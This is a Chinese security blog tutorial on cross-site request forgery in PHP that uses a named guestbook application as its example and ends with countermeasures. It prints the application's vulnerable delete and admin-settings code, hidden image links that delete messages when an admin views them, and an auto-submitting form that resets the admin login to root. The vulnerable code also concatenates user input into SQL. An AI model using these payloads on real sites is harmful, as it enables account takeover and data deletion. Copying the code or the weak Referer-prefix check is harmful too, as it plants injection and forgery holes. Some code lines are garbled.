蜗蜗侠's Blog-关注网络安全移动版

主页 > 编程语言 > PHP >

PHP漏洞全解(六)-CSRF跨网站请求伪造

时间:2016-11-29 11:48  来源:转载   作者:匿名投稿   点击:

本文主要介绍针对PHP网站的跨网站请求伪造。在CSRF所有攻击方式中包含攻击者伪造一个看起来是其他用户发起的HTTP 请求,事实上,跟踪一个用户发送的HTTP请求才是攻击者的目的。

CSRF(Cross Site Request Forgeries),意为跨网站请求伪造,也有写为XSRF。攻击者伪造目标用户的HTTP请求,然后此请求发送到有CSRF漏洞的网站,网站执行此请 求后,引发跨站请求伪造攻击。攻击者利用隐蔽的HTTP连接,让目标用户在不注意的情况下单击这个链接,由于是用户自己点击的,而他又是合法用户拥有合法 权限,所以目标用户能够在网站内执行特定的HTTP链接,从而达到攻击者的目的。

例如:某个购物网站购买商品时,采用http://blog.icxun.cn/buy.php?item=watch&num=1,item参数确定要购买什么物品,num参数确定要购买数量,如果攻击者以隐藏的方式发送给目标用户链接

,那么如果目标用户不小心访问以后,购买的数量就成了1000个

实例

随缘网络PHP留言板V1.0

任意删除留言

//delbook.php 此页面用于删除留言

  1.  
  2. include_once("dlyz.php"); //dlyz.php用户验证权限,当权限是admin的时候方可删除留言 
  3. include_once("../conn.php"); 
  4. $del=$_GET["del"]; 
  5. $id=$_GET["id"]; 
  6. if ($del=="data") 
  8. $ID_Dele= implode(",",$_POST['adid']); 
  9. $sql="delete from book where id in (".$ID_Dele.")"; 
  10. mysql_query($sql); 
  12. else 
  14. $sql="delete from book where id=".$id; //传递要删除的留言ID 
  15. mysql_query($sql); 
  17. mysql_close($conn); 
  18. echo ""; 
  19. echo "alert(‘删除成功!’);"; 
  20. echo " location=’book.php’;"; 
  21. echo ""; 
  22. ?> 

当我们具有admin权限,提交http://localhost/manage/delbook.php?id=2 时,就会删除id为2的留言

利用方法:

我们使用普通用户留言(源代码方式),内容为

  1. "delbook.php?id=2" /> 
  2. "delbook.php?id=3" /> 
  3. "delbook.php?id=4" /> 
  4. "delbook.php?id=5" />

插入4张图片链接分别删除4个id留言,然后我们返回首页浏览看,没有什么变化。。图片显示不了

现在我们再用管理员账号登陆后,来刷新首页,会发现留言就剩一条,其他在图片链接中指定的ID号的留言,全部都被删除。

攻击者在留言中插入隐藏的图片链接,此链接具有删除留言的作用,而攻击者自己访问这些图片链接的时候,是不具有权限的,所以看不到任何效果,但是当管理员登陆后,查看此留言,就会执行隐藏的链接,而他的权限又是足够大的,从而这些留言就被删除了

修改管理员密码

  1. //pass.php 
  2. if($_GET["act"]) 
  4. $username=$_POST["username"]; 
  5. $sh=$_POST["sh"]; 
  6. $gg=$_POST["gg"]; 
  7. $title=$_POST["title"]; 
  8. $copyright=$_POST["copyright"]."
    设计制作:厦门随缘网络科技"; 
  9. $password=md5($_POST["password"]); 
  10. if(emptyempty($_POST["password"])) 
  12. $sql="update gly set username=’".$username."’,sh=".$sh.",gg=’".$gg."’,title=’".$title."’,copyright=’".$copyright."’ where id=1"; 
  14. else 
  16. $sql="update gly set username=’".$username."’,password=’".$password."’,sh=".$sh.",gg=’".$gg."’,title=’".$title."’,copyright=’".$copyright."’ where id=1"; 
  18. mysql_query($sql); 
  19. mysql_close($conn); 
  20. echo ""; 
  21. echo "alert(‘修改成功!’);"; 
  22. echo " location=’pass.php’;"; 
  23. echo ""; 

这个文件用于修改管理密码和网站设置的一些信息,我们可以直接构造如下表单:

  1. <body
  2. <form action="http://localhost/manage/pass.php?act=xg" method="post" name="form1" id="form1"
  3. <input type="radio" value="1" name="sh"
  4. <input type="radio" name="sh" checked value="0"
  5. <input type="text" name="username" value="root"
  6. <input type="password" name="password" value="root"
  7. <input type="text" name="title" value="随缘网络PHP留言板V1.0(带审核功能)" 
  8. <textarea name="gg" rows="6" cols="80" >欢迎您安装使用随缘网络PHP留言板V1.0(带审核功能)!textarea
  9. <textarea name="copyright" rows="6" cols="80" >随缘网络PHP留言本V1.0 版权所有:厦门随缘网络科技 2005-2009<br/>承接网站建设及系统定制 提供优惠主机域名textarea
  10. form
  11. body

存为attack.html,放到自己网站上http://blog.icxun.cn/attack.html,此页面访问后会自动向目标程序的pass.php提交参数,用户名修改为root,密码修改为root,然后我们去留言板发一条留言,隐藏这个链接,管理访问以后,他的用户名和密码全部修改成了root

防范方法

防范CSRF要比防范其他攻击更加困难,因为CSRF的HTTP请求虽然是攻击者伪造的,但是却是由目标用户发出的,一般常见的防范方法有下面几种:

1、检查网页的来源

2、检查内置的隐藏变量

3、使用POST,不要使用GET

检查网页来源

在//pass.php头部加入以下红色字体代码,验证数据提交

  1. if($_GET["act"]) 
  3. if(isset($_SERVER["HTTP_REFERER"])) 
  5. $serverhost = $_SERVER["SERVER_NAME"]; 
  6. $strurl = str_replace("http://","",$_SERVER["HTTP_REFERER"]); 
  7. $strdomain = explode("/",$strurl); 
  8. $sourcehost = $strdomain[0]; 
  9. if(strncmp($sourcehost, $serverhost, strlen($serverhost))) 
  10. {
  11. unset($_POST); 
  12. echo ""; 
  13. echo "alert(‘数据来源异常!’);"; 
  14. echo " location=’index.php’;";
  15. echo ""; 
  18. $username=$_POST["username"]; 
  19. $sh=$_POST["sh"]; 
  20. $gg=$_POST["gg"]; 
  21. $title=$_POST["title"]; 
  22. $copyright=$_POST["copyright"]."
    设计制作:厦门随缘网络科技"; 
  23. $password=md5($_POST["password"]); 
  24. if(emptyempty($_POST["password"])) 
  26. $sql="update gly set username=’".$username."’,sh=".$sh.",gg=’".$gg."’,title=’".$title."’,copyright=’".$copyright."’ where id=1"; 
  28. else 
  30. $sql="update gly set username=’".$username."’,password=’".$password."’,sh=".$sh.",gg=’".$gg."’,title=’".$title."’,copyright=’".$copyright."’ where id=1"; 
  32. mysql_query($sql); 
  33. mysql_close($conn); 
  34. echo ""; 
  35. echo "alert(‘修改成功!’);"; 
  36. echo " location=’pass.php’;"; 
  37. echo ""; 

检查内置隐藏变量

我们在表单中内置一个隐藏变量和一个session变量,然后检查这个隐藏变量和session变量是否相等,以此来判断是否同一个网页所调用

  1. php 
  2. include_once("dlyz.php"); 
  3. include_once("../conn.php"); 
  4. if($_GET["act"]) 
  6. if (!isset($_SESSION["post_id"])) 
  8. // 生成唯一的ID,并使用MD5来加密 
  9. $post_id = md5(uniqid(rand(), true)); 
  10. // 创建Session变量 
  11. $_SESSION["post_id"] = $post_id; 
  13. // 检查是否相等 
  14. if (isset($_SESSION["post_id"])) 
  16. // 不相等 
  17. if ($_SESSION["post_id"] != $_POST["post_id"]) 
  19. // 清除POST变量 
  20. unset($_POST); 
  21. echo "<script language=’javascript’>"; 
  22. echo "alert(‘数据来源异常!’);"; 
  23. echo " location=’index.php’;"; 
  24. echo "script>"; 
  27. …… 
  28. <input type="reset" name="Submit2" value="重 置"
  29. <input type="hidden" name="post_id" value="php echo $_SESSION["post_id"];?>"
  30. td>tr
  31. table
  32. form
  33. php 
  35. mysql_close($conn); 
  36. ?> 
  37. body
  38. html

使用POST,不要使用GET

传递表单字段时,一定要是用POST,不要使用GET,处理变量也不要直接使用$_REQUEST

(责任编辑:蜗蜗侠)
    最近关注
    热点内容